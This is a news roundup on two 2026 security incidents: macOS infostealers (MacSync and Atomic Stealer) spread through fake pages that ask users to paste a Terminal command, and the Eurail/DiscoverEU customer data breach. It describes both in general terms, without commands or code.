Two new security incidents

A Mac can now be tricked with something as simple as a fake installer page that tells you to paste one command into Terminal, and that single paste can hand over browser logins, Keychain secrets, and cryptocurrency wallet data. CloudSEK says one recent campaign used a fake macOS cloud-storage site to deliver a script-driven stealer called MacSync. (cloudsek.com) Terminal is the text-only control panel built into macOS, and attackers like it because one copied command can do the work of a full app installer. In the MacSync case, the pasted command launched a Z shell script, fetched AppleScript from a remote server, and then started harvesting credentials and files. (cloudsek.com) AppleScript is Apple’s own automation language, meant for harmless jobs like moving files or clicking buttons, which makes it useful cover for malware. CloudSEK says the stolen password from the fake prompts let the script dig into Keychain, which is macOS’s built-in password vault, and pull out saved credentials and wallet data. (cloudsek.com) Atomic macOS Stealer, often shortened to Atomic Stealer or AMOS, is one of several information-stealing tools built specifically for Mac users. SentinelOne said Atomic Stealer can collect account passwords, browser data, session cookies, and cryptocurrency wallets, and Moonlock reported in March 2026 that another live campaign was disguising the malware as an artificial intelligence app for Mac users. (sentinelone.com, moonlock.com) That is why fake Apple pages work so well: the attack does not need a deep software flaw if it can borrow Apple’s look and ask the victim to do the dangerous step themselves. Moonlock said one Atomic Stealer operation pushed a disk image file named “Cleal_AI.dmg” through an impersonation site and promoted it with a social-media account created in February 2025. (moonlock.com) The Eurail breach is the opposite kind of problem: no phishing page, no pasted command, just customer data sitting in the wrong place inside cloud systems. SecurityWeek reported on April 9, 2026 that more than 300,000 people are being notified after a December 2025 Eurail breach exposed personal information taken from the Netherlands-based rail-pass company’s network. (securityweek.com) When Eurail first disclosed the incident in January 2026, the company said an unauthorized person had accessed part of its customer database. Eurail community posts and later reporting said the stolen fields included first and last names, dates of birth, email addresses, home addresses, telephone numbers, passport numbers, passport issuing country, and passport expiration date. (community.eurail.com, securityweek.com) Some of the worst records belonged to DiscoverEU travelers, who get rail passes through a European Union youth program. The European Commission said on January 13, 2026 that affected DiscoverEU data could also include copies of passports or identity cards, bank account reference numbers, and health data. (youth.europa.eu, securityweek.com) By mid-February, Eurail’s position had shifted from “no evidence of misuse” to confirmation that some of the stolen data was being offered for sale on the dark web and that a sample had been posted on Telegram. Security Affairs reported that update on February 17, 2026 after Eurail acknowledged the sale. (securityaffairs.com) Put together, the two incidents show the two oldest ways to lose data in 2026: one person is fooled into running a command on their own Mac, or one company leaves sensitive records exposed in cloud systems until someone finds them. In one case the target is your password vault and wallet app; in the other it is your passport record sitting in a travel database. (cloudsek.com, securityweek.com)